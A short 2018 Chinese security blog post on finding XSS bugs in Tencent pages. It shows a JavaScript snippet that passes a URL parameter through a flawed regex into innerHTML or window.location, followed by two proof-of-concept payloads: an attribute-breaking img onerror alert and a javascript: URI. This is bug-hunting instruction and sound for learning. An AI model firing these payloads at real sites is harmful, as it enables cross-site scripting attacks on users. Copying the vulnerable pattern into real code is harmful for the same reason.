guimaizi’s blog

从前


title: 如何像我一样刷腾讯xss url: 334.html id: 334 comments: false categories:

  • 安全/代码 date: 2018-11-15 14:14:02 tags:

ijxKDx.png 请看以下js:

<div id="c" style="margin:40px auto 0px;width:600px;text-align:center;"></div>
<script>
    function GetQueryString(name)
    {
         var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
         var r = window.location.search.substr(1).match(reg);
         if(r!=null)return  decodeURIComponent(r[2]); return null;

    }
    var r=GetQueryString('r');
    var reg = /^http:\/\/((.*\.qq\.com)|(localhost))\/.*]/i;
        if (reg.test(r)) {
            document.getElementById('c').innerHTML='欢迎您,454454545454'+',<a href="'+r+'">返回活动</a>';
    } else {
        window.location=r;
    }   


</script>

payload:

'"><img src=a onerror=alert()>  
javascript:alert()